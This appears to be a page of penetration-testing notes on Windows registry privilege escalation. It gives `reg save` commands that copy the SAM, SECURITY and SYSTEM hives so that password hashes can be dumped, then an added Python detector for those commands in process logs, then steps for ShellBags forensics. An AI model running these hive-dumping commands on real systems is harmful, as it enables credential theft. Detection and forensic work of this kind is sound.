Exploit Notes

Windows PrivEsc with Registry Keys

Last modified: 2023-02-08

Privilege Escalation Windows

The Windows Registry is a hierarchical database that stores low-level settings for Windows and for applications that opt to use the registry. Registry keys are container objects, which contain values and subkeys. They are similar to folders.

Registry Hives

A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files loaded into memory when the operating system is started or a user logs in.

If we can access the registry and obtain the registry hives, the password hashes can be dumped.
Copy the three hives (SAM, SECURITY, SYSTEM) to an arbitrary directory that we can access.

# save: Saves a copy of specified subkeys, entries, and values of the registry in a specified file.
reg save HKLM\sam c:\Users\<user>\Desktop\sam.save
reg save HKLM\security c:\Users\<user>\Desktop\security.save
reg save HKLM\system c:\Users\<user>\Desktop\system.save

After that, we can dump password hashes using these three files (sam.save, security.save, system.save).
See the details here.
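
A detection-side view of the `reg save` commands above, as an added example that is not part of the original notes: it scans process-creation command lines (such as those recorded by Security event 4688 or Sysmon event 1) for saves of the whole SAM, SECURITY or SYSTEM hive and groups them per host and user. The event tuples, host names and user names are constructed sample data, and the function name and severity labels are assumptions of this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# reg[.exe] save HKLM\<hive> ..., any case, optional full path and quotes.
# The lookahead rejects subkeys such as HKLM\SYSTEM\CurrentControlSet.
REG_SAVE = re.compile(
    r'(?:^|[\\/\s"])reg(?:\.exe)?"?\s+save\s+"?'
    r'(?:HKLM|HKEY_LOCAL_MACHINE)\\(SAM|SECURITY|SYSTEM)"?(?=\s|$)',
    re.IGNORECASE,
)

# Constructed sample events: (time, host, user, command line).
SAMPLE_EVENTS = [
    ("2023-02-08T10:00:01", "WS01", "alice", r"reg save HKLM\sam c:\Users\alice\Desktop\sam.save"),
    ("2023-02-08T10:00:05", "WS01", "alice",
     r'"C:\Windows\System32\reg.exe" save HKLM\security c:\Users\alice\Desktop\security.save'),
    ("2023-02-08T10:00:09", "WS01", "alice",
     r"cmd /c reg SAVE hkey_local_machine\SYSTEM c:\Users\alice\Desktop\system.save /y"),
    ("2023-02-08T11:30:00", "WS02", "bob", r"reg save HKLM\SYSTEM\CurrentControlSet\Services\Foo c:\temp\svc.save"),
    ("2023-02-08T11:31:00", "WS02", "bob", r"reg query HKLM\SAM"),
    ("2023-02-08T12:00:00", "WS03", "carol", r"reg save HKLM\SECURITY d:\backup\sec.hiv"),
]

def find_hive_saves(events, window=timedelta(minutes=10)):
    """Return one alert per (host, user) that saved a whole credential hive."""
    hits = defaultdict(list)
    for time, host, user, cmdline in events:
        match = REG_SAVE.search(cmdline)
        if match:
            hits[(host, user)].append((datetime.fromisoformat(time), match.group(1).upper()))
    alerts = []
    for (host, user), seen in sorted(hits.items()):
        seen.sort()
        first = seen[0][0]
        # Hives saved within `window` of the first save by this host/user.
        hives = {hive for when, hive in seen if when - first <= window}
        # SAM together with SYSTEM is rated higher: the SYSTEM hive holds
        # the boot key needed to decrypt the hashes stored in SAM.
        severity = "high" if {"SAM", "SYSTEM"} <= hives else "medium"
        alerts.append({"host": host, "user": user,
                       "hives": sorted(hives), "severity": severity})
    return alerts

if __name__ == "__main__":
    for alert in find_hive_saves(SAMPLE_EVENTS):
        print(alert)
```

Command-line logging must be enabled for process-creation events to carry the arguments this check relies on.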


ShellBags

ShellBags are a set of registry keys that store details about a viewed folder, such as its size, position, and icon.

Location

c:\Users\<username>\AppData\Local\Microsoft\Windows\UsrClass.dat

If we cannot find the AppData folder in Explorer, click the "View" tab and check "Hidden Items".

Access ShellBags

  1. Search for "regedit" in the search bar and open "Registry Editor"

  2. Go to "Computer\HKEY_CLASSES_ROOT\LocalSettings\Software\Microsoft\Windows\Shell\Bags"

ShellBags Explorer

Extract ShellBags information.

  1. Open "ShellBags Explorer"

  2. Select "File" -> "Load offline hive"

  3. Navigate to the UsrClass.dat and open the file

  4. Look for suspicious folders and files
